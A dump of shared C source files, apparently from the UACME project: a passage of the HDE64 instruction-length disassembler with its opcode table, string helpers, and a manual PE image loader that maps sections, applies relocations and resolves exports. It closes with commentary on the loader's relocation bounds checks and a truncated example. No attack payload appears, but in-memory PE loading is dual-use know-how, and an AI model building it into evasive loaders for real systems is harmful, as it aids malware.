DELTA_OP2_ONLY_MEM; //-V594 } else { ht = hde64_table + DELTA_OP_ONLY_MEM; table_end = ht + DELTA_OP2_ONLY_MEM - DELTA_OP_ONLY_MEM; //-V594 } for (; ht != table_end; ht += 2) if (*ht++ == opcode) { if (*ht++ & pref && !((*ht << m_reg) & 0x80)) goto error_operand; else break; } goto no_error_operand; } else if (hs->opcode2) { switch (opcode) { case 0x50: case 0xd7: case 0xf7: if (pref & (PRE_NONE | PRE_66)) goto error_operand; break; case 0xd6: if (pref & (PRE_F2 | PRE_F3)) goto error_operand; break; case 0xc5: goto error_operand; } goto no_error_operand; } else goto no_error_operand; error_operand: hs->flags |= F_ERROR | F_ERROR_OPERAND; no_error_operand: c = *p++; if (m_reg <= 1) { if (opcode == 0xf6) cflags |= C_IMM8; else if (opcode == 0xf7) cflags |= C_IMM_P66; } switch (m_mod) { case 0: if (pref & PRE_67) { if (m_rm == 6) disp_size = 2; } else if (m_rm == 5) disp_size = 4; break; case 1: disp_size = 1; break; case 2: disp_size = 2; if (!(pref & PRE_67)) disp_size <<= 1; } if (m_mod != 3 && m_rm == 4) { hs->flags |= F_SIB; p++; hs->sib = c; hs->sib_scale = c >> 6; hs->sib_index = (c & 0x3f) >> 3; if ((hs->sib_base = c & 7) == 5 && !(m_mod & 1)) disp_size = 4; } p--; switch (disp_size) { case 1: hs->flags |= F_DISP8; hs->disp.disp8 = *p; break; case 2: hs->flags |= F_DISP16; hs->disp.disp16 = *(uint16_t *)p; break; case 4: hs->flags |= F_DISP32; hs->disp.disp32 = *(uint32_t *)p; } p += disp_size; } else if (pref & PRE_LOCK) hs->flags |= F_ERROR | F_ERROR_LOCK; if (cflags & C_IMM_P66) { if (cflags & C_REL32) { if (pref & PRE_66) { hs->flags |= F_IMM16 | F_RELATIVE; hs->imm.imm16 = *(uint16_t *)p; p += 2; goto disasm_done; } goto rel32_ok; } if (op64) { hs->flags |= F_IMM64; hs->imm.imm64 = *(uint64_t *)p; p += 8; } else if (!(pref & PRE_66)) { hs->flags |= F_IMM32; hs->imm.imm32 = *(uint32_t *)p; p += 4; } else goto imm16_ok; } if (cflags & C_IMM16) { imm16_ok: hs->flags |= F_IMM16; hs->imm.imm16 = *(uint16_t *)p; p += 2; } if (cflags & C_IMM8) { hs->flags |= 
      F_IMM8;
    hs->imm.imm8 = *p++;
  }

  if (cflags & C_REL32) {
    rel32_ok:
    hs->flags |= F_IMM32 | F_RELATIVE;
    hs->imm.imm32 = *(uint32_t *)p;
    p += 4;
  } else if (cflags & C_REL8) {
    hs->flags |= F_IMM8 | F_RELATIVE;
    hs->imm.imm8 = *p++;
  }

  disasm_done:

  if ((hs->len = (uint8_t)(p-(uint8_t *)code)) > 15) {
    hs->flags |= F_ERROR | F_ERROR_LENGTH;
    hs->len = 15;
  }

  return (unsigned int)hs->len;
}

#pragma warning(pop)

================================================
FILE: Source/Shared/hde/hde64.h
================================================
/*
 * Hacker Disassembler Engine 64
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
 *
 * hde64.h: C/C++ header file
 *
 */

#ifndef _HDE64_H_
#define _HDE64_H_

/* stdint.h - C99 standard header
 * http://en.wikipedia.org/wiki/stdint.h
 *
 * if your compiler doesn't contain "stdint.h" header (for
 * example, Microsoft Visual C++), you can download file:
 *   http://www.azillionmonkeys.com/qed/pstdint.h
 * and change next line to:
 *   #include "pstdint.h"
 */
#include "pstdint.h"

#define F_MODRM         0x00000001
#define F_SIB           0x00000002
#define F_IMM8          0x00000004
#define F_IMM16         0x00000008
#define F_IMM32         0x00000010
#define F_IMM64         0x00000020
#define F_DISP8         0x00000040
#define F_DISP16        0x00000080
#define F_DISP32        0x00000100
#define F_RELATIVE      0x00000200
#define F_ERROR         0x00001000
#define F_ERROR_OPCODE  0x00002000
#define F_ERROR_LENGTH  0x00004000
#define F_ERROR_LOCK    0x00008000
#define F_ERROR_OPERAND 0x00010000
#define F_PREFIX_REPNZ  0x01000000
#define F_PREFIX_REPX   0x02000000
#define F_PREFIX_REP    0x03000000
#define F_PREFIX_66     0x04000000
#define F_PREFIX_67     0x08000000
#define F_PREFIX_LOCK   0x10000000
#define F_PREFIX_SEG    0x20000000
#define F_PREFIX_REX    0x40000000
#define F_PREFIX_ANY    0x7f000000

#define PREFIX_SEGMENT_CS   0x2e
#define PREFIX_SEGMENT_SS   0x36
#define PREFIX_SEGMENT_DS   0x3e
#define PREFIX_SEGMENT_ES   0x26
#define PREFIX_SEGMENT_FS   0x64
#define PREFIX_SEGMENT_GS   0x65
#define PREFIX_LOCK         0xf0
#define PREFIX_REPNZ        0xf2
#define PREFIX_REPX         0xf3
#define PREFIX_OPERAND_SIZE 0x66
#define PREFIX_ADDRESS_SIZE 0x67

#pragma pack(push,1)

typedef struct {
    uint8_t len;
    uint8_t p_rep;
    uint8_t p_lock;
    uint8_t p_seg;
    uint8_t p_66;
    uint8_t p_67;
    uint8_t rex;
    uint8_t rex_w;
    uint8_t rex_r;
    uint8_t rex_x;
    uint8_t rex_b;
    uint8_t opcode;
    uint8_t opcode2;
    uint8_t modrm;
    uint8_t modrm_mod;
    uint8_t modrm_reg;
    uint8_t modrm_rm;
    uint8_t sib;
    uint8_t sib_scale;
    uint8_t sib_index;
    uint8_t sib_base;
    union {
        uint8_t imm8;
        uint16_t imm16;
        uint32_t imm32;
        uint64_t imm64;
    } imm;
    union {
        uint8_t disp8;
        uint16_t disp16;
        uint32_t disp32;
    } disp;
    uint32_t flags;
} hde64s;

#pragma pack(pop)

#ifdef __cplusplus
extern "C" {
#endif

/* __cdecl */
unsigned int hde64_disasm(const void *code, hde64s *hs);

#ifdef __cplusplus
}
#endif

#endif /* _HDE64_H_ */

================================================
FILE: Source/Shared/hde/pstdint.h
================================================
/*
 *  MinHook - The Minimalistic API Hooking Library for x64/x86
 *  Copyright (C) 2009-2015 Tsuda Kageyu. All rights reserved.
 *
 *  Redistribution and use in source and binary forms, with or without
 *  modification, are permitted provided that the following conditions
 *  are met:
 *
 *   1. Redistributions of source code must retain the above copyright
 *      notice, this list of conditions and the following disclaimer.
 *   2. Redistributions in binary form must reproduce the above copyright
 *      notice, this list of conditions and the following disclaimer in the
 *      documentation and/or other materials provided with the distribution.
 *
 *  THIS SOFTWARE IS PROVIDED BY THE AUTHOR "AS IS" AND ANY EXPRESS OR
 *  IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
 *  OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
 *  IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
 *  INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
 *  NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
 *  DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
 *  THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
 *  (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
 *  THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 */

#pragma once

// windows.h supplies the INT8/UINT8 ... INT64/UINT64 fixed-width typedefs
// used below (the angle-bracket include was lost in extraction).
#include <windows.h>

// Integer types for HDE.
typedef INT8   int8_t;
typedef INT16  int16_t;
typedef INT32  int32_t;
typedef INT64  int64_t;
typedef UINT8  uint8_t;
typedef UINT16 uint16_t;
typedef UINT32 uint32_t;
typedef UINT64 uint64_t;

================================================
FILE: Source/Shared/hde/table64.h
================================================
/*
 * Hacker Disassembler Engine 64 C
 * Copyright (c) 2008-2009, Vyacheslav Patkov.
 * All rights reserved.
 *
 */

#define C_NONE    0x00
#define C_MODRM   0x01
#define C_IMM8    0x02
#define C_IMM16   0x04
#define C_IMM_P66 0x10
#define C_REL8    0x20
#define C_REL32   0x40
#define C_GROUP   0x80
#define C_ERROR   0xff

#define PRE_ANY  0x00
#define PRE_NONE 0x01
#define PRE_F2   0x02
#define PRE_F3   0x04
#define PRE_66   0x08
#define PRE_67   0x10
#define PRE_LOCK 0x20
#define PRE_SEG  0x40
#define PRE_ALL  0xff

#define DELTA_OPCODES      0x4a
#define DELTA_FPU_REG      0xfd
#define DELTA_FPU_MODRM    0x104
#define DELTA_PREFIXES     0x13c
#define DELTA_OP_LOCK_OK   0x1ae
#define DELTA_OP2_LOCK_OK  0x1c6
#define DELTA_OP_ONLY_MEM  0x1d8
#define DELTA_OP2_ONLY_MEM 0x1e7

unsigned char hde64_table[] = {
  0xa5,0xaa,0xa5,0xb8,0xa5,0xaa,0xa5,0xaa,0xa5,0xb8,0xa5,0xb8,0xa5,0xb8,0xa5,
  0xb8,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xc0,0xac,0xc0,0xcc,0xc0,0xa1,0xa1,
  0xa1,0xa1,0xb1,0xa5,0xa5,0xa6,0xc0,0xc0,0xd7,0xda,0xe0,0xc0,0xe4,0xc0,0xea,
  0xea,0xe0,0xe0,0x98,0xc8,0xee,0xf1,0xa5,0xd3,0xa5,0xa5,0xa1,0xea,0x9e,0xc0,
  0xc0,0xc2,0xc0,0xe6,0x03,0x7f,0x11,0x7f,0x01,0x7f,0x01,0x3f,0x01,0x01,0xab,
  0x8b,0x90,0x64,0x5b,0x5b,0x5b,0x5b,0x5b,0x92,0x5b,0x5b,0x76,0x90,0x92,0x92,
  0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x6a,0x73,0x90,
  0x5b,0x52,0x52,0x52,0x52,0x5b,0x5b,0x5b,0x5b,0x77,0x7c,0x77,0x85,0x5b,0x5b,
  0x70,0x5b,0x7a,0xaf,0x76,0x76,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,0x5b,
  0x5b,0x5b,0x86,0x01,0x03,0x01,0x04,0x03,0xd5,0x03,0xd5,0x03,0xcc,0x01,0xbc,
  0x03,0xf0,0x03,0x03,0x04,0x00,0x50,0x50,0x50,0x50,0xff,0x20,0x20,0x20,0x20,
  0x01,0x01,0x01,0x01,0xc4,0x02,0x10,0xff,0xff,0xff,0x01,0x00,0x03,0x11,0xff,
  0x03,0xc4,0xc6,0xc8,0x02,0x10,0x00,0xff,0xcc,0x01,0x01,0x01,0x00,0x00,0x00,
  0x00,0x01,0x01,0x03,0x01,0xff,0xff,0xc0,0xc2,0x10,0x11,0x02,0x03,0x01,0x01,
  0x01,0xff,0xff,0xff,0x00,0x00,0x00,0xff,0x00,0x00,0xff,0xff,0xff,0xff,0x10,
  0x10,0x10,0x10,0x02,0x10,0x00,0x00,0xc6,0xc8,0x02,0x02,0x02,0x02,0x06,0x00,
  0x04,0x00,0x02,0xff,0x00,0xc0,0xc2,0x01,0x01,0x03,0x03,0x03,0xca,0x40,0x00,
  0x0a,0x00,0x04,0x00,0x00,0x00,0x00,0x7f,0x00,0x33,0x01,0x00,0x00,0x00,0x00,
  0x00,0x00,0xff,0xbf,0xff,0xff,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0xff,0x00,
  0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xff,0xff,
  0x00,0x00,0x00,0xbf,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x7f,0x00,0x00,
  0xff,0x40,0x40,0x40,0x40,0x41,0x49,0x40,0x40,0x40,0x40,0x4c,0x42,0x40,0x40,
  0x40,0x40,0x40,0x40,0x40,0x40,0x4f,0x44,0x53,0x40,0x40,0x40,0x44,0x57,0x43,
  0x5c,0x40,0x60,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,0x40,
  0x40,0x40,0x64,0x66,0x6e,0x6b,0x40,0x40,0x6a,0x46,0x40,0x40,0x44,0x46,0x40,
  0x40,0x5b,0x44,0x40,0x40,0x00,0x00,0x00,0x00,0x06,0x06,0x06,0x06,0x01,0x06,
  0x06,0x02,0x06,0x06,0x00,0x06,0x00,0x0a,0x0a,0x00,0x00,0x00,0x02,0x07,0x07,
  0x06,0x02,0x0d,0x06,0x06,0x06,0x0e,0x05,0x05,0x02,0x02,0x00,0x00,0x04,0x04,
  0x04,0x04,0x05,0x06,0x06,0x06,0x00,0x00,0x00,0x0e,0x00,0x00,0x08,0x00,0x10,
  0x00,0x18,0x00,0x20,0x00,0x28,0x00,0x30,0x00,0x80,0x01,0x82,0x01,0x86,0x00,
  0xf6,0xcf,0xfe,0x3f,0xab,0x00,0xb0,0x00,0xb1,0x00,0xb3,0x00,0xba,0xf8,0xbb,
  0x00,0xc0,0x00,0xc1,0x00,0xc7,0xbf,0x62,0xff,0x00,0x8d,0xff,0x00,0xc4,0xff,
  0x00,0xc5,0xff,0x00,0xff,0xff,0xeb,0x01,0xff,0x0e,0x12,0x08,0x00,0x13,0x09,
  0x00,0x16,0x08,0x00,0x17,0x09,0x00,0x2b,0x09,0x00,0xae,0xff,0x07,0xb2,0xff,
  0x00,0xb4,0xff,0x00,0xb5,0xff,0x00,0xc3,0x01,0x00,0xc7,0xff,0xbf,0xe7,0x08,
  0x00,0xf0,0x02,0x00
};

================================================
FILE: Source/Shared/itostr.c
================================================
#include "rtltypes.h"

size_t itostr_a(int x, char *s)
{
    int t;
    size_t i, r = 1, sign;

    t = x;
    if (x < 0) {
        sign = 1;
        while (t <= -10) {
            t /= 10;
            r++;
        }
    }
    else {
        sign = 0;
        while (t >= 10) {
            t /= 10;
            r++;
        }
    }

    if (s == 0)
        return r + sign;

    if (sign) {
        *s = '-';
        s++;
    }

    for (i = r; i != 0; i--) {
        s[i - 1] = (char)byteabs(x % 10) + '0';
        x /= 10;
    }
    s[r] = (char)0;

    return r + sign;
}

size_t itostr_w(int x, wchar_t *s)
{
    int t;
    size_t i, r = 1, sign;

    t = x;
    if (x < 0) {
        sign = 1;
        while (t <= -10) {
            t /= 10;
            r++;
        }
    }
    else {
        sign = 0;
        while (t >= 10) {
            t /= 10;
            r++;
        }
    }

    if (s == 0)
        return r + sign;

    if (sign) {
        *s = '-';
        s++;
    }

    for (i = r; i != 0; i--) {
        s[i - 1] = (wchar_t)byteabs(x % 10) + L'0';
        x /= 10;
    }
    s[r] = (wchar_t)0;

    return r + sign;
}

================================================
FILE: Source/Shared/ldr.c
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2025
*
*  TITLE:       LDR.C
*
*  VERSION:     3.69
*
*  DATE:        07 Jul 2025
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#include "global.h"

DWORD align_gt(
    DWORD p,
    DWORD align
)
{
    DWORD remainder;

    if (align == 0)
        return p;

    remainder = p % align;
    if (remainder == 0)
        return p;

    // saturate rather than wrap around on a huge value
    if (p > MAXDWORD - (align - remainder))
        return p;

    return p + (align - remainder);
}

DWORD align_le(
    DWORD p,
    DWORD align
)
{
    // an alignment of zero would divide by zero below
    if (align == 0)
        return p;

    if ((p % align) == 0)
        return p;

    return p - (p % align);
}

LPVOID PELoaderLoadImage(
    _In_ LPVOID Buffer,
    _Out_opt_ PDWORD SizeOfImage
)
{
    DWORD c, p, rsz, relRva, targetRva, copySize;
    DWORD optHeaderSize = 0, headersSize = 0;
    DWORD_PTR delta;
    LPWORD chains;
    LPVOID exeBuffer = NULL;
    BOOL relocOk = TRUE;
    PIMAGE_DOS_HEADER dosh;
    PIMAGE_FILE_HEADER fileh;
    PIMAGE_OPTIONAL_HEADER popth;
    PIMAGE_SECTION_HEADER sections;
    PIMAGE_BASE_RELOCATION rel;
    PIMAGE_NT_HEADERS nth = NULL;

    do {
        if (Buffer == NULL) {
            SetLastError(ERROR_INVALID_PARAMETER);
            break;
        }

        // check image headers
        // we are supposed to deal with valid or system bins usually so these checks are slightly redundant
        dosh = (PIMAGE_DOS_HEADER)Buffer;
        if (dosh->e_magic != IMAGE_DOS_SIGNATURE) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            break;
        }
        if (dosh->e_lfanew < sizeof(IMAGE_DOS_HEADER) || dosh->e_lfanew > 0xFFFFF) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            break;
        }

        nth = (PIMAGE_NT_HEADERS)((PBYTE)Buffer + dosh->e_lfanew);
        if (nth->Signature != IMAGE_NT_SIGNATURE) {
            SetLastError(ERROR_INVALID_EXE_SIGNATURE);
            break;
        }

        fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
        optHeaderSize = fileh->SizeOfOptionalHeader;
        if (optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER32) &&
            optHeaderSize != sizeof(IMAGE_OPTIONAL_HEADER64))
        {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            break;
        }

        popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));
        if (popth->Magic != IMAGE_NT_OPTIONAL_HDR32_MAGIC &&
            popth->Magic != IMAGE_NT_OPTIONAL_HDR64_MAGIC)
        {
            SetLastError(ERROR_EXE_MARKED_INVALID);
            break;
        }

        if (SizeOfImage)
            *SizeOfImage = popth->SizeOfImage;

        // render image
        headersSize = align_gt(popth->SizeOfHeaders, popth->FileAlignment);
        if (headersSize > popth->SizeOfImage) {
            SetLastError(ERROR_BAD_EXE_FORMAT);
            break;
        }

        exeBuffer = VirtualAlloc(NULL, popth->SizeOfImage, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
        if (exeBuffer == NULL) {
            SetLastError(ERROR_NOT_ENOUGH_MEMORY);
            break;
        }

        memcpy(exeBuffer, Buffer, min(headersSize, popth->SizeOfHeaders));

        sections = (PIMAGE_SECTION_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER) + fileh->SizeOfOptionalHeader);

        for (c = 0; c < fileh->NumberOfSections; c++) {
            if ((sections[c].SizeOfRawData > 0) && (sections[c].PointerToRawData > 0)) {

                copySize = align_gt(sections[c].SizeOfRawData, popth->FileAlignment);

                // the destination range must stay inside the allocated image,
                // otherwise a crafted section header writes past exeBuffer
                if (sections[c].VirtualAddress > popth->SizeOfImage ||
                    copySize > popth->SizeOfImage - sections[c].VirtualAddress)
                {
                    break;
                }

                memcpy((PBYTE)exeBuffer + sections[c].VirtualAddress,
                    (PBYTE)Buffer + align_le(sections[c].PointerToRawData, popth->FileAlignment),
                    copySize);
            }
        }

        // the section loop was aborted above on a bad section header
        if (c < fileh->NumberOfSections) {
            VirtualFree(exeBuffer, 0, MEM_RELEASE);
            exeBuffer = NULL;
            SetLastError(ERROR_BAD_EXE_FORMAT);
            break;
        }

        // reloc image
        dosh = (PIMAGE_DOS_HEADER)exeBuffer;
        fileh = (PIMAGE_FILE_HEADER)((PBYTE)dosh + sizeof(DWORD) + dosh->e_lfanew);
        popth = (PIMAGE_OPTIONAL_HEADER)((PBYTE)fileh + sizeof(IMAGE_FILE_HEADER));

        if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC &&
            popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0)
        {
            relRva = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
            rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size;

            // the relocation directory itself must lie inside the mapped image
            if (relRva > popth->SizeOfImage || rsz > popth->SizeOfImage - relRva) {
                relocOk = FALSE;
            }
            else {
                rel = (PIMAGE_BASE_RELOCATION)((PBYTE)exeBuffer + relRva);
                delta = (DWORD_PTR)exeBuffer - popth->ImageBase;

                c = 0;
                while (c < rsz) {

                    // every block needs a complete header, a SizeOfBlock that
                    // covers at least that header (zero would never advance c)
                    // and that does not run past the directory, and a page RVA
                    // inside the image so targetRva below cannot wrap
                    if (rsz - c < sizeof(IMAGE_BASE_RELOCATION) ||
                        rel->SizeOfBlock < sizeof(IMAGE_BASE_RELOCATION) ||
                        rel->SizeOfBlock > rsz - c ||
                        rel->VirtualAddress > popth->SizeOfImage)
                    {
                        relocOk = FALSE;
                        break;
                    }

                    p = sizeof(IMAGE_BASE_RELOCATION);
                    chains = (LPWORD)((PBYTE)rel + p);

                    while (p + sizeof(WORD) <= rel->SizeOfBlock) {

                        targetRva = rel->VirtualAddress + (*chains & 0x0fff);

                        switch (*chains >> 12) {

                        case IMAGE_REL_BASED_HIGHLOW:
                            // the 4 byte fixup must be fully inside the image
                            if (targetRva >= popth->SizeOfImage ||
                                popth->SizeOfImage - targetRva < sizeof(DWORD))
                            {
                                relocOk = FALSE;
                                break;
                            }
                            *(LPDWORD)((ULONG_PTR)exeBuffer + targetRva) += (DWORD)delta;
                            break;

                        case IMAGE_REL_BASED_DIR64:
                            // the 8 byte fixup must be fully inside the image
                            if (targetRva >= popth->SizeOfImage ||
                                popth->SizeOfImage - targetRva < sizeof(ULONGLONG))
                            {
                                relocOk = FALSE;
                                break;
                            }
                            *(PULONGLONG)((ULONG_PTR)exeBuffer + targetRva) += delta;
                            break;

                        }

                        if (!relocOk)
                            break;

                        chains++;
                        p += sizeof(WORD);
                    }

                    if (!relocOk)
                        break;

                    c += rel->SizeOfBlock;
                    rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock);
                }
            }

            // malformed relocation data: do not hand back a half-fixed image
            if (!relocOk) {
                VirtualFree(exeBuffer, 0, MEM_RELEASE);
                exeBuffer = NULL;
                SetLastError(ERROR_BAD_EXE_FORMAT);
                break;
            }
        }

        return exeBuffer;

    } while (FALSE);

    return NULL;
}

LPVOID PELoaderGetProcAddress(
    _In_ LPVOID ImageBase,
    _In_ PCHAR RoutineName
)
{
    USHORT OrdinalIndex;
    LONG Result;
    PIMAGE_EXPORT_DIRECTORY ExportDirectory = NULL;
    PULONG NameTableBase, FunctionTableBase;
    PUSHORT NameOrdinalTableBase;
    PCHAR CurrentName;
    ULONG High, Low, Middle = 0;
    ULONG ExportDirRVA, ExportDirSize;
    ULONG FunctionRVA;
    union {
        PIMAGE_NT_HEADERS64 nt64;
        PIMAGE_NT_HEADERS32 nt32;
        PIMAGE_NT_HEADERS nt;
    } NtHeaders;

    if (ImageBase == NULL || RoutineName == NULL) {
        SetLastError(ERROR_INVALID_PARAMETER);
        return NULL;
    }

    NtHeaders.nt = RtlImageNtHeader(ImageBase);
    if (NtHeaders.nt == NULL) {
        SetLastError(ERROR_INVALID_PARAMETER);
        return NULL;
    }

    if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_AMD64) {
        ExportDirRVA = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        ExportDirSize = NtHeaders.nt64->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
    }
    else if (NtHeaders.nt->FileHeader.Machine == IMAGE_FILE_MACHINE_I386) {
        ExportDirRVA = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress;
        ExportDirSize = NtHeaders.nt32->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].Size;
    }
    else {
        SetLastError(ERROR_EXE_MACHINE_TYPE_MISMATCH);
        return NULL;
    }

    if (ExportDirRVA == 0 || ExportDirSize == 0) {
        SetLastError(ERROR_PROC_NOT_FOUND);
        return NULL;
    }

    ExportDirectory = (PIMAGE_EXPORT_DIRECTORY)RtlOffsetToPointer((ULONG_PTR)ImageBase, ExportDirRVA);
    NameTableBase = (PULONG)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNames);
    NameOrdinalTableBase = (PUSHORT)RtlOffsetToPointer(ImageBase, (ULONG)ExportDirectory->AddressOfNameOrdinals);
    FunctionTableBase = (PULONG)((ULONG_PTR)ImageBase + ExportDirectory->AddressOfFunctions);

    if (ExportDirectory->NumberOfNames == 0) {
        SetLastError(ERROR_PROC_NOT_FOUND);
        return NULL;
    }

    // names are sorted, so binary search them
    Low = 0;
    High = ExportDirectory->NumberOfNames - 1;

    while (Low <= High) {
        Middle = Low + (High - Low) / 2;
        CurrentName = (PCHAR)RtlOffsetToPointer((ULONG_PTR)ImageBase, NameTableBase[Middle]);
        Result = _strcmp_a(RoutineName, CurrentName);

        if (Result == 0) {
            OrdinalIndex = NameOrdinalTableBase[Middle];
            if (OrdinalIndex >= ExportDirectory->NumberOfFunctions) {
                SetLastError(ERROR_PROC_NOT_FOUND);
                return NULL;
            }

            FunctionRVA = FunctionTableBase[OrdinalIndex];
            if (FunctionRVA == 0) {
                SetLastError(ERROR_PROC_NOT_FOUND);
                return NULL;
            }

            return (LPVOID)RtlOffsetToPointer((ULONG_PTR)ImageBase, FunctionRVA);
        }

        if (Result < 0) {
            // High is unsigned: stop before it wraps below zero
            if (Middle == 0)
                break;
            High = Middle - 1;
        }
        else {
            Low = Middle + 1;
        }
    }

    SetLastError(ERROR_PROC_NOT_FOUND);
    return NULL;
}

================================================
FILE: Source/Shared/ldr.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2015 - 2017
*
*  TITLE:       LDR.H
*
*  VERSION:     2.72
*
*  DATE:        26 May 2017
*
*  Common header file for PE loader unit.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

LPVOID PELoaderLoadImage(
    _In_ LPVOID Buffer,
    _Out_opt_ PDWORD SizeOfImage);

LPVOID PELoaderGetProcAddress(
    _In_ LPVOID ImageBase,
    _In_ PCHAR RoutineName);

================================================
FILE: Source/Shared/libinc.h
================================================
/*******************************************************************************
*
*  (C) COPYRIGHT AUTHORS, 2018
*
*  TITLE:       LIBINC.H
*
*  VERSION:     1.0.02
*
*  DATE:        18 Nov 2018
*
*  Master header file for C Runtime libraries include.
*
*  THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
*  ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
*  TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
*  PARTICULAR PURPOSE.
*
*******************************************************************************/

#pragma once

#if defined (_MSC_VER)
#if (_MSC_VER >= 1900)
//VS15, 17 etc
#ifdef _DEBUG
#pragma comment(lib, "vcruntimed.lib")
#pragma comment(lib, "ucrtd.lib")
#else
#pragma comment(lib, "libucrt.lib")
#pragma comment(lib, "libvcruntime.lib")
#endif
#endif
#endif

================================================
FILE: Source/Shared/minirtl.h
================================================
/*
Module name:
    minirtl.h

Description:
    header for string handling and conversion routines

Date:
    4 Oct 2020
*/

#pragma once

#ifndef _MINIRTL_
#define _MINIRTL_

// string copy/concat/length

char *_strend_a(const char *s);
wchar_t *_strend_w(const wchar_t *s);

char *_strcpy_a(char *dest, const char *src);
wchar_t *_strcpy_w(wchar_t *dest, const wchar_t *src);

char *_strcat_a(char *dest, const char *src);
wchar_t *_strcat_w(wchar_t *dest, const wchar_t *src);

char *_strncpy_a(char *dest, size_t ccdest, const char *src, size_t ccsrc);
wchar_t *_strncpy_w(wchar_t *dest, size_t ccdest, const wchar_t *src, size_t ccsrc);

char *_strcpyn_a(char* dest, const char* src, size_t n);
wchar_t *_strcpyn_w(wchar_t* dest, const wchar_t* src, size_t n);

size_t _strlen_a(const char *s);
size_t _strlen_w(const wchar_t *s);

// comparing

int _strcmp_a(const char *s1, const char *s2);
int _strcmp_w(const wchar_t *s1, const wchar_t *s2);

int _strncmp_a(const char *s1, const char *s2, size_t cchars);
int _strncmp_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);

int _strcmpi_a(const char *s1, const char *s2);
int _strcmpi_w(const wchar_t *s1, const wchar_t *s2);

int _strncmpi_a(const char *s1, const char *s2, size_t cchars);
int _strncmpi_w(const wchar_t *s1, const wchar_t *s2, size_t cchars);
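PELoaderLoadImage in Source/Shared/ldr.c above walks the base relocation directory trusting the SizeOfBlock and page offsets it reads out of the image it is mapping. Since it reserves exactly SizeOfImage bytes, any fixup whose RVA is past that size is an out-of-bounds write on the heap, and a block with SizeOfBlock of zero never advances the loop. The program below is an added example written for this page, not code from UACME; it re-declares the IMAGE_BASE_RELOCATION layout under a local name so it compiles without the Windows SDK, builds a constructed in-memory image with one relocation block, and applies the fixups with the checks a loader needs. The image size, the directory RVA and the preferred-base values in it are made up for the test.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* Same layout as the SDK's IMAGE_BASE_RELOCATION: a header followed by
 * 16-bit entries, fixup type in the top 4 bits, page offset in the low 12. */
typedef struct { uint32_t VirtualAddress; uint32_t SizeOfBlock; } BASE_RELOCATION;

#define REL_ABSOLUTE 0   /* IMAGE_REL_BASED_ABSOLUTE: padding, no write */
#define REL_HIGHLOW  3   /* IMAGE_REL_BASED_HIGHLOW:  32-bit fixup */
#define REL_DIR64    10  /* IMAGE_REL_BASED_DIR64:    64-bit fixup */

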